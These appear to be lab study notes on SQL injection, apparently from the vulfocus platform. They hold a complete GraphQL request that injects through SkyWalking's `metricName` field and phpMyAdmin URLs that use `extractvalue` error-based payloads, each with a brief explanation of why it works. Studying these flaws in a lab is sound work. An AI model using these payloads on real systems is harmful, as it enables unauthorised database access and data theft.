SQL注入漏洞学习
http://vulfocus.io/#/dashboard
union all select DATABASE()
select DATABASE()
converting \"SKYWALKING-OAP-DB\"
message":"Exception while fetching data (/queryLogs) : Data conversion error converting \"SKYWALKING-OAP-DB\";
SQL statement:\nselect count(1) total from (select 1 from INFORMATION_SCHEMA.USERS union all select DATABASE())a where 1=? or 1=? or 1=? -- where 1=1 and endpoint_id = ? and status_code = ? and trace_id = ? ) [22018-196]"}

Why this error matters: the response echoes the full statement template, which shows that `metricName` is concatenated into the query unquoted as the table name of `select 1 from <metricName>`, and that the original WHERE clause binds exactly three parameters (`endpoint_id`, `status_code`, `trace_id`). The payload therefore closes the subquery with `)a where 1=? or 1=? or 1=? --` so the bound-parameter count still matches while the real filter is commented out. The `[22018-196]` suffix is H2's data-conversion error: the first UNION branch yields the integer `1` while `DATABASE()` yields a string, and H2 reports the offending value verbatim — so the type mismatch itself leaks the database name (`SKYWALKING-OAP-DB`) and works as an error-based oracle. Note that the later `union select 1,group_concat(table_name) ...` payload returns two columns against a one-column first branch, so column counts must be aligned before that variant can run.
queryLogs
INFORMATION_SCHEMA.USERS 1 order by 5)a
POST /graphql HTTP/1.1
Host:192.168.8.230:56464
Content-Type: application/json;charset=utf-8
Content-Length: 691
Connection: close
{
"query":"query queryLogs($condition: LogQueryCondition) {
queryLogs(condition: $condition) {
total
logs {
serviceId
serviceName
isError
content
}
}
}
",
"variables":{
"condition":{
"metricName":"INFORMATION_SCHEMA.USERS union select 1,group_concat(table_name) from information_schema.tables where table_schema='SKYWALKING-OAP-DB')a where 1=? or 1=? or 1=? --",
"endpointId":"1",
"traceId":"1",
"state":"ALL",
"stateCode":"1",
"paging":{
"pageSize":10
}
}
}
}

&token=47245172262b2b247668267b39553e75
http://123.58.236.76:22356/pma/db_search.php?db=information_schema
http://123.58.236.76:22356/pma/server_privileges.php?ajax_request=true&validate_username=1&username=1%27and%20extractvalue(1,concat(0x7e,(select%20user()),0x7e))--+db=&token=47245172262b2b247668267b39553e75&viewing_mode=server
http://123.58.236.76:22356/pma/server_privileges.php?ajax_request=true&validate_username=1&username=1%27and%20extractvalue(1,concat(0x7e,(select%20database()),0x7e))--+db=&token=47245172262b2b247668267b39553e75&viewing_mode=server

Encoding note: the comment terminator must be two ASCII hyphens followed by a space (`--+`, where `+` decodes to a space). The copied URLs had been auto-corrected to an en dash (`–`, percent-encoded as `%E2%80%93`), which MySQL does not treat as a comment start, so the injected statement fails to parse and the `extractvalue` error never fires.
